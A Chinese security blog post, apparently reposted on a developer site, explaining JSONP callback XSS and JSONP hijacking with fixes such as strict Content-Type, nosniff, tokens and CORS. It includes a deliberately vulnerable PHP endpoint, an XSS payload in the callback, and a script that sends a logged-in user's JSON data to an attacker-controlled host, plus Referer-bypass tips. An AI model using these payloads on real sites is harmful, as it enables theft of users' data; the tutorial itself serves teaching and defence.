jsonp 劫持 & 防御

最新推荐文章于 2024-08-20 11:16:35 发布
最新推荐文章于 2024-08-20 11:16:35 发布
阅读量2.8k 收藏
点赞数

http://vinc.top/2017/02/09/jsonp%E5%AF%BC%E8%87%B4%E7%9A%84%E5%AE%89%E5%85%A8%E9%97%AE%E9%A2%98/

1、Callback可自定义导致的安全问题
Content-type与XSS漏洞
再输出 JSON 时,没有严格定义好 Content-Type( Content-Type: application/json )然后加上 callback 这个输出点没有进行过滤直接导致了一个典型的 XSS 漏洞。例如:

<script>
function test(v){
    alert(v.name);
    }
</script>
<script src="http://10.59.0.248/1.php?callback=test"></script>

1.php:

<?php
$callback = $_GET['callback'];
print $callback.'({"id" : "1","name" : "vincent"});';
?>

访问http://10.59.0.248/1.php?callback=test”><img/src=x οnerrοr=alert(1)>
对于这种漏洞,主要修复手段:
1)严格定义 Content-Type: application / json
2)过滤 callback 以及 JSON 数据输出
针对输出结果进行转码处理,但是需要注意UTF-7 XSS,强制指定 Content-Type里的编码 ( Content-Type: application/json; charset=utf-8 )

2、Json劫持
JSON 劫持又为“ JSON Hijacking ”,这里其实是属于CSRF的范畴。攻击者可以在自己的站点中写入一条访问Json的JS,在用户Cookie未过期的情况下,Json中会返回敏感的用户信息,然后攻击者可以获取到数据,并发送到自己的站点。
回调函数是动态,主要有以下几类情况:
1)完全可控(GET变量)
回调函数在URL中指定,我们可以完全控制它。
2)部分可控,比如附加动态的数字,每个会话都不同
如果附加的数字比较短,可以遍历创建回调函数。
3)完全可控,但是没有显示在原始请求中
最后一个场景涉及一个显然没有回调的API调用,因此没有可见的JSONP。 这可能发生在开发人员,为其他软件或代码留下隐藏的向后兼容性只是没有在重构时删除。 因此,当看到没有回调的API调用时,特别是如果JSON格式的数据已经在括号之间,手动添加回调到请求。
如果我们有以下API调用http://10.59.0.248/1.php,我们可能会尝试猜测回调变量:
http://10.59.0.248/1.php?callback=test
http://10.59.0.248/1.php?cb=test
其他的还有func、function、call、jsonp、jsonpcallback等等。
参考案例:
http://www.codesec.net/view/172245.html

敏感数据获取程序如下:

<script>
function test(data){
    //alert(v.name);
    var xmlhttp = new XMLHttpRequest();
    var url = "http://192.168.192.120/" + JSON.stringify(data);
    xmlhttp.open("GET",url,true);
    xmlhttp.send();
    }
</script>
<script src="http://10.59.0.248/1.php?callback=test"></script>

查看下日志:

需要注意的是Content-Type和X-Content-Type-Options头,如果在API请求的响应标头中,X-Content-Type-Options设置为nosniff,则必须将Content-Type设置为JavaScript(text/javascript,application/javascript,text/ecmascript等)来在所有浏览器上生效。 这是因为通过在响应中包含回调,响应不再是JSON,而是JavaScript。

如果配置:

header("Content-type: application/json;charset=utf-8");
header("X-Content-Type-Options:nosniff");

Console输出如下:

Refused to execute script from 'http://10.59.0.248/1.php?callback=test' because its MIME type ('application/json') is not executable, and strict MIME type checking is enabled.

常见的修复方案:
1)Referer正则匹配
常见的有Referer匹配正则编写错误导致正则绕过。
另外在很多情况下,开发者在部署过滤 Referer 来源时,忽视了一个空 Referer 的过滤。一般情况下浏览器直接访问某 URL 是不带 Referer 的,所以很多防御部署是允许空 Referer 的。

可以看到请求头中没有Referer。
2)添加Token
3)放弃使用Jsonp跨域获取数据,使用CORS或者PostMessage


PD_3569
关注
同源策略——CORS和JSONP劫持漏洞
m0_61506558的博客
11-03 755
同源策略是一个重要的安全策略,它用于限制一个origin的文档或者它加载的脚本如何能与另一个源的资源进行交互。它能帮助阻隔恶意文档,减少可能被攻击的媒介。如果两个URL拥有相同的协议(http、https)、端口和主机,那么这两个URL就是同源的。JSONP(JSON with Padding) 是 json 的一种”使用模式”,可以让网页从别的域(网站)那获取资料,即跨域读取数据。JSONP实现跨域请求的原理简单的说,就是动态创建标签,然后利用的 src不受。
【漏洞挖掘】——45、 JSONP攻防原理
Fly_鹏程万里
06-07 67
{"id":"1","name":"知道创宇"}callback({"id":"1","name":"知道创宇"});phpprint $callback.'({"id":"1","name":"知道创宇"})';?callback=?});
JSONP 劫持
weixin_38885346的博客
05-02 413
一、什么是JSONP JSONP(Json in Paddig) 第一、在网络为了传输数据与读取数据有统一的格式,所以使用json结构来重构数据,简单点就是键值对; 第二、由于同源策略,所以不同域的网站无法通过AJAX直接读取数据,比如一个银行,有两个不同域的网站,一个网站可以以json格式显示用户信息,银行希望另一个网站能够读取到这些信息; 第三、虽然不能跨域请求,但是能跨域脚本包含 基于此,JSONP诞生了,其实JSONP的实现原理就是JSONP劫持的实现原理,用个靶场举例: 二、实现原理 目标网
jsonp跨域的安全问题
Daisy花园
04-24 8946
JSONP没有关于错误调用的处理,一旦回调函数失败,浏览器就会以静默失败的方式处理。 只支持GET请求 安全性问题 1、Callback可自定义导致的安全问题Content-type与XSS漏洞 再输出 JSON 时,没有严格定义好 Content-Type( Content-Type: application/json )然后加上 callback 这个输出点没有进行过滤直接导致了一个典型的 X
JSONP跨域访问漏洞
最新发布
YhMjQx的博客
08-20 789
本篇文章主要讲解JSONP跨域访问过程存在的漏洞机制
使用jsonp解决跨域问题
qq_45481620的博客
09-12 2699
什么是跨域: 1、域不同时。 2、域相同,端口不同。 只有域相同、端口相同时,才可以访问。 可以使用jsonp解决跨域问题。 什么是jsonp? Jsonp其实就是一个跨域解决方案。Js跨域请求数据是不可以的,但是js跨域请求js脚本是可以的。可以把数据封装成一个js语句,做一个方法的调用。跨域请求js脚本可以得到此脚本。得到js脚本之后会立即执行。可以把数据做为参数传递到方法。就可以获得数据。从而解决跨域问题。 标题jsonp的 原理 浏览器在js请求,是允许通过script标签的src跨域请求
jsonp劫持漏洞研究与防范
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
08-22 744
文章目录背景知识jsonp同源策略JSONP劫持????栗子防范 背景知识 jsonp Jsonp(JSON with Padding) 是 json 的一种"使用模式",可以让网页从别的域(网站)那获取资料,即跨域读取数据,也就是说可以通过这个技术,绕过同源策略。 JSONP 由两部分组成:回调函数和数据。回调函数是当响应到来时应该在页面调用的函数。回调函数字一般是在请求指定的。而数据就是传入回调函数的 JSON 数据。 同源策略 同源策略(Same Origin Policy),它是由 Ne
jsonp劫持
think_ycx的专栏
01-31 3429
基础: 说说JSON和JSONP,也许你会豁然开朗,含jQuery用例     JSONP 安全攻防技术 【技术分享】JSONP注入实战指南  案例: payload: $.ajax({type:"get",url:"http://o2odemo.fanwe.net/mapi/index.php?ctl=synclogin&act=index&login_type=Sina
同源策略与cors跨域及jsonp劫持
j1044957016的博客
05-31 873
文章目录前言一、同源策略二、Ajax技术三、CORS跨域1.简单请求2.非简单请求3.漏洞成因及修复四、jsonp劫持总结 前言 本文整理同源策略,Ajax,cors跨域及jsonp劫持 一、同源策略 同源策略(Same Origin Policy):该策略是浏览器的一个安全基石,如果没有同源策略,那么,你打开了一个合法网站,又打开了一个恶意网站。恶意网站的脚本能够随意的操作合法网站的任何可操作资源,没有任何限制。(防止内部资源被外部页面脚本读取或篡改) 浏览器的同源策略规定: 不同域的客户端脚本在没有
浅谈JSONP跨域漏洞
weixin_39664643的博客
10-11 2820
浅谈JSONP跨域漏洞 CSRF(Cross site request forgery)跨站请求伪造,一种挟持用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法,跟XSS相比,XSS 利用的是网站对用户的信任,CSRF 利用的是网站对用户网页浏览器的信任。 提起CSRF,可能很多人都会想到修改个人资料、授权登陆等等攻击场景,可以发现这两个场景都是写入型的CSRF漏洞,通常会忽视更常见的读取型的CSRF漏洞,主流如下两种 JSONP跨域资源读取 CORS跨域资源读取 当持有敏感资源数据的服务器没
JSONP原理以及安全问题
我不是大牛
04-25 1679
JSONP介绍 JSONP全称是JSON with Padding ,是基于JSON格式的为解决跨域请求资源而产生的解决方案。他实现的基本原理是利用了 HTML 里 元素标签没有跨域限制 JSONP原理就是动态插入带有跨域url的script标签,然后调用回调函数,把我们需要的json数据作为参数传入,通过一些逻辑把数据显示在页面上。 比如如下代码所示,通过script标签完成http://loc...
jsonp安全攻防技术(JSON劫持、XSS漏洞)
tiancityycf的专栏
06-07 3362
关于 JSONP JSONP 全称是 JSON with Padding ,是基于 JSON 格式的为解决跨域请求资源而产生的解决方案。他实现的基本原理是利用了 HTML 里 <script></script> 元素标签,远程调用 JSON 文件来实现数据传递。如要在 a.com 域下获取存在 b.com 的 JSON 数据( getUsers.JSON ): {"id":"1","name":"字"} 那么他们可以首先通过 JSONP 的“ Padding...
JSONP安全性分析
winnerX的专栏
06-20 791
1、主要是callback参数有没有进行适当的处理,否则会造成XSS漏洞,结合CSRF可以获取信息。比方说参数为callback=alert(1);truecallback,需要服务器B进行请求过滤转码。 2、http://zone.wooyun.org/content/16309 这段代码的大致意思就是假设黑客发给C一个html文件或者一个网址,C打开以后,这个恶意链接的js代码会执行,会
常见WEB漏洞:JSONP安全与防御
weixin_43815032的博客
04-17 351
01 JSONP 1.1 JSONP的概念浏览器的同源策略使得比如 http://www.a.com 的网站没法直接获取 http://www.b.com 的相关数据,那么假如在一些应用场景一定要获取怎么办?JSONP就是一种解决方式,所以说它是解决跨域请求资源而产生的解决方案。 ...
MIME type 问题的解决
有问题可关注公众号:前端研究院 后台输入问题回复
06-06 3106
出现背景: 在vue项目最后的打包部署阶段,打包成一个dist静态文件夹,其内放置的是一些静态文件,然后在编辑器直接运行index.html,出现以下错误:Refused to execute script from 'URL' because its MIME type ('text/html') is not executable, and strict MIME type checking...
Sping Boot 页面css无法加载 because its MIME type ('application/json') is not a supported stylesheet ...
热门推荐
不再更新,新博客 chgl16.space
12-19 8万+
错误描述 Refused to apply style from 'http://localhost:8080/static/css/login.css' because its MIME type ('application/json') is not a supported stylesheet MIME type, and strict MIME checking is enabled....
生产环境浏览器Strict MIME TYPE Checking问题解决
皖南笑笑生的博客
08-10 6万+
X-Content-Type-Options: nosniff 与 不规范的响应类型 造成的影响
Sping Boot 页面css无法加载 because its MIME type (‘application/json‘) is not a supported stylesheet ...
qq_34640883的博客
12-26 2677
链接: 去解决问题.
输出 JSON 数据时的 Content-Type
weixin_33874713的博客
01-29 4253
导语 缘由是这样的,给前端返回 json 数据,反馈说数据不对(前端是在原代码基础上复制修改的,去掉 jsonp)。看了下后端代码,发现是两次返回 json 的代码不同。但这不是问题的原因,然后再一看 JS 代码,是前端没有进行转换。也正好借此机会,看了下平时没有注意到的点。 分析 日常写代码,返回一些简短数据的时候,没有使用框架封装的方...
理解JSON与JSONP劫持及防范措施
"本文档详细探讨了JSON和JSONP劫持的概念、攻击方式及相应的解决方案,旨在帮助开发者理解和防止这类安全威胁。" JSON劫持是一种针对Web应用的安全攻击,它利用了JSON格式返回敏感数据的方式。当一个Web应用将敏感...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值